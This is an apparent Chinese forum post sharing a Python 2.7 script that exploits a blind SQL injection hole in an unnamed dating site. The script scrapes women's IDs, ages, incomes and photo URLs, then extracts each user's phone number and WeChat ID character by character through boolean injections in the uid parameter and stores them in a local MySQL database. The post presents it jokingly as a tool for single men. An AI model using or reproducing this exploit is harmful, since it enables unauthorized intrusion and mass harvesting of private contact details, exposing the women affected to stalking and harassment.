某相亲网漏洞,可盲注获得手机号和微信号。
功能1:爬取所有女性ID、年龄、月薪、照片URL
功能2:通过盲注方式获取对应ID的手机号和微信号
功能3:所有数据自动导入MYSQL
缺点:单线程
这个代码写得好心酸。。单身狗必备
# -*- coding: utf-8 -*-
# @Time : 2018-7-24 13:13
# @Author : meinaozi
# @File : hehe.py
# @Software: PyCharm
# @Ver : Python2.7
import sys, requests, json
import MySQLdb
from math import ceil
if sys.getdefaultencoding() != 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
def get_data(url):
res = requests.get(url, headers=headers)
return res.text
headers = {
'UserAgent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15G77 MicroMessenger/6.7.1 NetType/WIFI Language/zh_CN',
'Referer': 'https://www.*******.com/******/plugin.php?id=*******&mod=*******&pid=1000****&from=singlemessage&isappinstalled=0',
'Cookie': '***********************************'
}
def get_tel_len(uid):
for k in range(10, 13):
URL1 = "https://www.*******.com/******/plugin.php?id=******&mod=visiting_card&pid=1000*****"
URL2 = URL1 + "&uid=" + uid + " and length(tel)=" + str(k) + "-- a&Submit=Submit"
if get_data(URL2).find("&uid=" + uid) > 1:
data_len = k
break
print "Telphone length is : %s" % data_len
return data_len
def get_wx_len(uid):
for k in range(6, 21):
URL1 = "https://www.*******.com/******/plugin.php?id=********&mod=visiting_card&pid=1000******"
URL2 = URL1 + "&uid=" + uid + " and length(wx)=" + str(k) + "-- a&Submit=Submit"
if get_data(URL2).find("&uid=" + uid) > 1:
data_len = k
break
print "wecat length is : %s" % data_len
return data_len
def get_tel(uid, data_len):
URL1 = "https://www.********.com/*****/plugin.php?id=**********&mod=visiting_card&pid=1000*******"
payload_num = "0123456789"
tel = ""
for j in range(1, data_len + 1):
for l in payload_num:
URL3 = URL1 + "&uid=" + uid + " and substr(LOWER(tel)," + str(j) + ",1)='" + l + "'-- a&Submit=Submit"
if get_data(URL3).find("&uid=" + uid) > 1:
tel = tel + l
break
print "Telphone is : %s" % tel
return tel
def get_wx(uid, data_len):
URL1 = "https://www.********.com/*****/plugin.php?id=**********&mod=visiting_card&pid=1000*****"
payload_num = "abcdefjhijklmnopqrstuvwxyz0123456789_-"
tel = ""
for j in range(1, data_len + 1):
for l in payload_num:
URL3 = URL1 + "&uid=" + uid + " and substr(LOWER(wx)," + str(j) + ",1)='" + l + "'-- a&Submit=Submit"
if get_data(URL3).find("&uid=" + uid) > 1:
tel = tel + l
break
print "wecat is : %s " % tel
return tel
def charge(mid, i): # 判断大小
global uid
ur = "https://www.********.com/*****/plugin.php?id=*******&mod=visiting_card&pid=100********"
url = ur + "&uid=%s and ascii(substr(wx,%s,1))<=%s-- a&Submit=Submit" % (uid,i,mid)
#
# print url
# sys.exit()
s = requests.get(url=url,headers=headers)
content = s.content
# print content
# sys.exit()
# print length
if content.find("&uid=" + uid) > 10:
return 1
else:
return 0
def dichotomie(l, r, i): # 利用二分法查找
mid = (l + r) / 2
# print "l and r ,mid:",l,r,mid
if l == r:
global string
string += chr(r)
print string
return 0
if charge(mid, i): # <=
# print 0
dichotomie(l, mid, i)
else:
# print 1
dichotomie(int(ceil((l + r) * 1.0 / 2)), r, i)
def get_public_data(page):
URL1 = "https://api.********.cn/*****/plugin.php?id=*****_zhaopin&mod=*******&openid=******************&uid=********&usersex=1&pid=100********&type=ajax&open_province_id=420&action=&search=&sex=12&typeFrom=&age=20&height=30&income=40&xueli=50&province_id=&city_id=&page=%s" % page
ret = json.loads(get_data(URL1))
return ret
def insert_user(uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide):
global db
cursor = db.cursor()
sql = "INSERT INTO user(uid,nickname,age,yx,pic1,pic2,pic3,pic4,pic5,tel,wx,hide) VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide)
try:
cursor.execute(sql)
db.commit()
return True
except Exception, e:
db.rollback()
print e
# return False
def select_data(sql, mode="single"):
global db
cursor = db.cursor()
cursor.execute(sql)
if mode == 'single':
return cursor.fetchone()
elif mode == 'update':
db.commit()
return True
else:
return cursor.fetchall()
def close_db():
global db
if db:
db.close()
if __name__ == '__main__':
while True:
action = raw_input("请选择模式:[1]拉取最新信息 [2]输入uid查询手机号码和微信\r\n".decode('utf-8').encode('gbk'))
if action and action in ("1", "2"):
break
else:
print "输入错误\r\n".decode('utf-8').encode('gbk')
if action == "1":
try:
db = MySQLdb.connect("localhost", "root", "123456", "xq",
charset='utf8')
except Exception, e:
print e
z = 0
for i in range(1, 13):
ret = get_public_data(i)
if ret['code'] == u'200':
for j in range(len(ret['data'])):
uid = ret['data'][j]['id']
nickname = ret['data'][j]['nickname']
age = ret['data'][j]['age']
yx = ret['data'][j]['yx']
pic1 = ""
if (len(ret['data'][j]['picurl1']) > 1): pic1 = ret['data'][j]['picurl1']
pic2 = ""
if (len(ret['data'][j]['picurl2']) > 1): pic2 = ret['data'][j]['picurl2']
pic3 = ""
if (len(ret['data'][j]['picurl3']) > 1): pic3 = ret['data'][j]['picurl3']
pic4 = ""
if (len(ret['data'][j]['picurl4']) > 1): pic4 = ret['data'][j]['picurl4']
pic5 = ""
if (len(ret['data'][j]['picurl5']) > 1): pic5 = ret['data'][j]['picurl5']
tel = ""
wx = ""
hide = 0
SQLret = select_data("select uid from `user` where uid='%s'" % uid, "single")
if not SQLret:
if insert_user(uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide):
z = z + 1
print "insert count: %s line" % z
close_db()
elif action == "2" :
while True:
uid = raw_input("请输入uid\r\n".decode('utf-8').encode('gbk'))
if uid and uid.isdigit():
break
else:
print "输入错误\r\n".decode('utf-8').encode('gbk')
try:
db = MySQLdb.connect("localhost", "root", "123456", "xq",
charset='utf8')
except Exception, e:
print e
# print get_public_data(11)
# get_public_data(11)['code'] == 200
SQLret = select_data("select uid from `user` where uid='%s'" % uid, "single")
if not SQLret:
print "can't find this uid in mysql"
sys.exit()
tel_len = get_tel_len(uid)
#tel_len = 11
tel = get_tel(uid, tel_len)
SQLret = select_data("update `user` set tel='%s' where uid='%s'" % (tel,uid) ,"update")
if SQLret:
print "tel update ok!"
string = ""
wx_len = get_wx_len(uid)
for i in range(1, wx_len + 1): # range第二个参数是字段长度
dichotomie(44, 123, i)
print string
#wx = get_wx(uid, wx_len)
SQLret = select_data("update `user` set wx='%s' where uid='%s'" % (string,uid) ,"update")
if SQLret:
print "wx update ok!"
close_db()
231
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
